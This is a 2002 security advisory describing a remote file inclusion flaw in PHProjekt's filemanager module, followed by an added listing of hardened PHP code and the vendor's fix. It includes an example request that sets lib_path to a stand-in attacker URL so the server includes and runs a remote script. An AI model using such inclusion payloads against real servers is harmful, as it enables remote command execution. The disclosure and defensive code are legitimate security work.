[UNIX] Command execution in phprojekt

From: support@securiteam.com
Date: 03/16/02


From: support@securiteam.com
To: list@securiteam.com
Date: Sat, 16 Mar 2002 12:22:20 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Command execution in phprojekt
------------------------------------------------------------------------

SUMMARY

PHProjekt is a modular application for coordinating group activities and
for sharing information and documents over an intranet or the internet.
The script is a content management system for websites, much like
slashcode or phpnuke.
A vulnerability in this application allows remote attackers to execute
commands on the web server.

DETAILS

The problem is in the filemanager module. The module can be accessed
directly, and the request can then define values that would have been
set by the script's global configuration file had the module not been
called directly. The first line in filemanager/filemanager_forms.php is:

include_once("$lib_path/access_form.inc.php");

So an attacker could go to
http://example.com/filemanager/filemanager_forms.php?lib_path=http://attacker/nasty/scripts

and the script at http://attacker/nasty/scripts/access_form.inc.php would
get include()'d.

If PHP is compiled with allow_url_fopen off, an attacker has a harder
time exploiting this. Guessing the path to an uploaded script then seems
to be the only other way of exploiting it (if magic_quotes is on;
otherwise a null byte can do some damage). Apparently this makes it
secure: if the attacker uploads a script under the field name lib_path,
the temporary path (e.g. /tmp/random/access_form.inc.php) is stored in
$lib_path, so the include_once would try to include
/tmp/random/access_form.inc.php/access_form.inc.php, which does not work.
PHP deletes the temporary file /tmp/random/access_form.inc.php when the
request ends, so it cannot be sent as lib_path once the error message (if
display_errors is on) has told the attacker the path to the script.

It would be best if every module included the global configuration file
as its first line, and if the code were double-checked to make sure no
variable is left for other scripts to pass in. A modules.php dispatcher
script like the one phpnuke has would not be a bad idea either: it
enforces security by making sure a module script is never called
directly.

The author took this advice and added this as the first line in the
module:

if (!defined("lib_included")) { die("Please use index.php!"); }
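The following listing is an added illustration, not PHProjekt's own code. It shows the two sides of the pattern the advisory recommends, a dispatching index.php and the module it loads, in one file for readability; the names lib_included, $lib_path and access_form.inc.php come from the advisory, while the index.php dispatcher and directory layout are assumed.

```php
<?php
// Added illustration, not PHProjekt's own code. The module name, $lib_path,
// access_form.inc.php and the lib_included marker follow the advisory; the
// index.php dispatcher and directory layout are assumed.

// ---- index.php: the only script meant to be called directly --------------
define('lib_included', 1);                // marker the modules test for
$lib_path = __DIR__ . '/lib';             // set server-side, never from input

// Dispatch through a fixed table of modules; the include path is never
// built from a request parameter.
$modules = ['filemanager' => __DIR__ . '/filemanager/filemanager_forms.php'];
$mod = isset($_GET['mod']) ? $_GET['mod'] : '';
if (!isset($modules[$mod])) {
    die('Unknown module');
}
require $modules[$mod];

// ---- filemanager/filemanager_forms.php -----------------------------------
// The line the advisory quotes. Called directly with register_globals on,
// $lib_path is whatever the query string says, so a remote or local file of
// the requester's choosing is included:
//
//     include_once("$lib_path/access_form.inc.php");
//
// Hardened form. First the author's fix: refuse to run unless index.php
// defined the marker, which also guarantees $lib_path was set there.
if (!defined('lib_included')) { die('Please use index.php!'); }

// Defence in depth: resolve the file and confirm it really lies below the
// configured library directory before including it, so even a tainted
// $lib_path (a URL, or a path with "../") would be rejected.
$base   = realpath($lib_path);
$target = realpath($lib_path . '/access_form.inc.php');
if ($base === false || $target === false
    || strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
    die('Invalid library path');
}
include_once $target;
```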

Vendor response:

The author was contacted and was very quick to respond. They also took
the security problem seriously, released a patch as soon as possible, and
notified their mailing list. The author says the script is due for a
rewrite to improve overall security and structure. A new version will be
out shortly.

ADDITIONAL INFORMATION

The information has been provided by b0iler <mailto:b0iler@hotmail.com>.



